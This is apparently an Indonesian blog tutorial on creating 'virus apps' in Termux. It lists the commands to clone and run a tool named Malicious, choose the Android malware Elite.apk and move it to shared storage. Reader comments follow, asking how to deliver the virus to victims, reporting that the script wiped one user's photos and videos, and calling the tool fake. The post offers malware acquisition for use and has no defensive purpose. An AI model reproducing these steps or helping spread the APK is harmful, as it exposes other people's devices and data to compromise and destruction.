✔ Cara Membuat Aplikasi Virus di Termux work 100% no root

Hai Semua Kembali Lagi dengan saya nah pada kesempatan kali ini saya akan share tutorial bagaimana caranya untuk membuat virus aplikasi di termux..

(Kalian Bisa juga melihat tutorial nya via video di channel saya

Link : https://youtu.be/fcNEeiVliUs

)

Oke langsung saja kita ke TUTORIAL nya

1.) Install Termux
Nah pertama pastikan kalian menginstall termux terlebih dahulu ya dan pastikan yang terupdate KALIAN bisa download termux nya di play store oke



2.) Masuk kan Script nya
Nah jika sudah selesai menginstall termux sekrang kita masuk kan script nya terlebih dahulu

Di sini saya menggunakan tools Malicious

Script
$pkg update 
$ pkg upgrade
$pkg install python2
$pkg install git
$git clone https://github.com/Mr-xDODOL/Malicious
$cd Malicious
$unzip Malicious
$cd Malicious
$pip2 install -r requirements.txt
$pip2 install tqdm
$pip2 install requests
$chmod 777 malicious.py
$python2 malicious.py

3.) Pilih jenis virus nya
Nah sekarang kita pilih jenis virus nya dulu ya

-pilih yg android jika ingin membuat virus aplikasi untuk android

-pilih windows untuk di laptop

-kalian bisa pilih sesuai kebutuhan

Di sini saya pilih yg Android

Jika sudah pilih yg Android sekrang pilih virus nya

Di sini saya pilih yg no 15 Elite.apk
Jika sudah maka otomatis mendownload file apk virus nya sampai selesai

4.) Pindahkan virus nya
Nah jika sudah selesai maka pindah kan virus aplikasi nya

Ketik

$ls (LS)
untuk melihat isi folder

Ketik
$cd Android
Karena saya tadi memilih virus untuk Android

Ketik
$termux-setup-storage
$mv Elite.apk /sdcard

Karena saya tadi memilih virus Elite.apk(sesuai in dengan nama virus nya)

Dan pindah kan ke memori internal (sdcard) ini internal ya bukan external bukan kartu memori tambah an bukan

Oke sekarang kalian cek di penyimpanan kalian

Selesai :)
Jika masih bingung bisa nonton video di bawah

Comments

  1. PM ane bang mau ku ajak bentuk 1 Tim

    ReplyDelete
  2. Artikel goblog gk jelas gk urut asu

    ReplyDelete
  3. Work bang... Makasih yha bang:)

    ReplyDelete
    Replies
    1. masak no bang dah work apknya tapi cara lempar virusnya gmana bos

      Delete
    2. cara lempar virusnya gmn bang?

      Delete
  4. Haduh njer foto&video yg ada di storage ke hapus semua gara gara SC ini

    ReplyDelete
  5. Bng klo penyimpanan nya /extsdcard gbsa kh?..soalnya sd card gw russk bang

    ReplyDelete
  6. {Ini pun palsu juga tools nya}

    Hay guys buat kalian semua yg baca pesan saya ini.. Kalian bisa kok gabung dengan saya atau bertukar ilmu hacking bisa kok,
    Coba ajh liat fb saya :
    Nama: Chaniago
    Poto sampulnya yg bertulisan:
    Chaniago cyber
    Dan, poto profil saya:
    Lambang hacking saya sendiri.

    Terimakasih and selamat perjumpa dengan saya.

    Dan yang buat tools ini saya pesan ke lu, tolong kalau buat tools itu HARUS LENGKAP dan tepat.

    ReplyDelete
  7. Min dampak virus elite tu apa?????

    ReplyDelete
  8. Di file saya kok gaada ya padahal udah berhasil

    ReplyDelete

Post a Comment

Popular Posts